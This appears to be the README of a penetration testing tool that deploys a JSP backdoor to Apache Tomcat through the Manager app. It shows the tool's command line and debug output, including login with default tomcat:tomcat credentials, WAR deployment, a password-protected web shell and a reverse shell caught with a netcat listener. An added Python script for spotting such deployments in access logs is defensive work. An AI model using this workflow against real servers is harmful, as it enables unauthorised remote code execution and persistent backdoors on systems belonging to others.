## tomcatWarDeployer
Apache Tomcat auto WAR deployment & pwning penetration testing tool.
https://github.com/mgeeky/tomcatWarDeployer
-f myshell.war
Allows supplying a custom WAR file.
```
user$ python tomcatWarDeployer.py -C -x -v -H 192.168.56.101 -p 4545 -n shell 192.168.56.100:8080
Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky '16
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 192.168.56.101:4545.
DEBUG: Browsing to "http://192.168.56.100:8080/manager/"... Creds: tomcat:tomcat
DEBUG: Apache Tomcat Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code...
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for shell WAR at: "/tmp/tmpzndaGR"
DEBUG: Working with Java at version: 1.8.0_60
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/shell.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 541) (out= 254)(deflated 53%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 68) (out= 67)(deflated 1%)
adding: index.jsp(in = 4684) (out= 1597)(deflated 65%)
DEBUG: WAR file structure:
DEBUG: /tmp/tmpzndaGR
├── files
│   ├── META-INF
│   │   └── MANIFEST.MF
│   └── WEB-INF
│       └── web.xml
└── index.jsp
3 directories, 3 files
WARNING: Application with name: "shell" is already deployed.
DEBUG: Unloading existing one...
DEBUG: Unloading application: "http://192.168.56.100:8080/shell/"
DEBUG: Succeeded.
DEBUG: Deploying application: shell from file: "/tmp/shell.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpzndaGR"
DEBUG: Succeeded, invoking it...
DEBUG: Invoking application at url: "http://192.168.56.100:8080/shell/"
DEBUG: Adding 'X-Pass: b8vYQ9EU7suV' header for shell functionality authentication.
WARNING: Set up your incoming shell listener, I'm giving you 3 seconds.
INFO: JSP Backdoor up & running on http://192.168.56.100:8080/shell/
INFO: Happy pwning, here take that password for web shell: 'b8vYQ9EU7suV'
```
This results in the following JSP application, accessible remotely over the web:
![JSP backdoor gui](screen1.png)
As one can see, a password is needed to use the deployed backdoor, which prevents unauthenticated access during the assessment.
This particular example also **pops a reverse shell** by connecting to *192.168.56.101:4545*.
On that host one can observe:
```
user $ nc -klvp 4545
listening on [any] 4545 ...
192.168.56.100: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.100] 44423
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
```
To sum up, the user has deployed a web application that provides a web backdoor, authenticated via a POST 'password' parameter that can be specified by the user or randomly generated by the program. Then, upon receiving the *X-Pass* header in the invocation phase, the application spawned a reverse connection to our *netcat* handler. The HTTP header is required so that a user refreshing the web GUI does not keep triggering the bind or reverse connection attempt. It also means that authentication is needed to reach that code.
That would be all I guess.
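For defenders, the sequence in the debug output above (unload, deploy, then invoke the new context) leaves a trail in Tomcat's access log. The following is an added example, not part of tomcatWarDeployer or its README: it assumes the standard Tomcat Manager `deploy`/`undeploy`/`upload` endpoints and the `common` access-log pattern, and the sample log lines and the function name `find_manager_deployments` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Tomcat's "common" access-log pattern: %h %l %u %t "%r" %s %b
SAMPLE_LOG = """\
192.0.2.10 - tomcat [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 200 15212
192.0.2.10 - tomcat [01/Jan/2024:10:00:02 +0000] "GET /manager/text/undeploy?path=/shell HTTP/1.1" 200 57
192.0.2.10 - tomcat [01/Jan/2024:10:00:03 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 52
192.0.2.10 - - [01/Jan/2024:10:00:06 +0000] "GET /shell/ HTTP/1.1" 200 1597
192.0.2.20 - - [01/Jan/2024:10:01:00 +0000] "GET /docs/index.html HTTP/1.1" 200 9021
192.0.2.30 - deployer [01/Jan/2024:10:02:00 +0000] "PUT /manager/text/deploy?path=/billing HTTP/1.1" 401 2473
"""

LINE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')
MANAGER_OP = re.compile(r"^/manager/(?:text/|html/)?(deploy|undeploy|upload)$")

def find_manager_deployments(log_text):
    """Return findings for Manager deploy/undeploy calls and first use of a new context."""
    findings, watched = [], {}          # watched: context path -> deploying client
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue                    # skip lines that are not in the expected pattern
        client, user, method, target, status = m.groups()
        url = urlsplit(target)
        op = MANAGER_OP.match(url.path)
        if op:
            context = parse_qs(url.query).get("path", [None])[0]
            # 2xx means the Manager accepted the request, not that the deployment succeeded
            ok = status.startswith("2")
            findings.append({"type": "manager_" + op.group(1), "client": client,
                             "user": user, "context": context, "accepted": ok})
            if ok and op.group(1) in ("deploy", "upload") and context:
                watched[context.rstrip("/")] = client
            continue
        for context, deployer in list(watched.items()):
            if url.path == context or url.path.startswith(context + "/"):
                findings.append({"type": "new_context_invoked", "client": client,
                                 "user": user, "context": context,
                                 "same_client_as_deployer": client == deployer})
                del watched[context]    # report only the first hit per deployment
    return findings

if __name__ == "__main__":
    for finding in find_manager_deployments(SAMPLE_LOG):
        print(finding)
```

The `user` field comes from `%u`, so a Manager request authenticated with a default account such as the `tomcat` login seen in the debug output shows up by name in each finding.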
### TODO
* ~~Implement bind & reverse tcp payload functionality~~ as well as some pty to interact with it
* Finish implementing noconnect and connect functionality
* Test it on tomcat8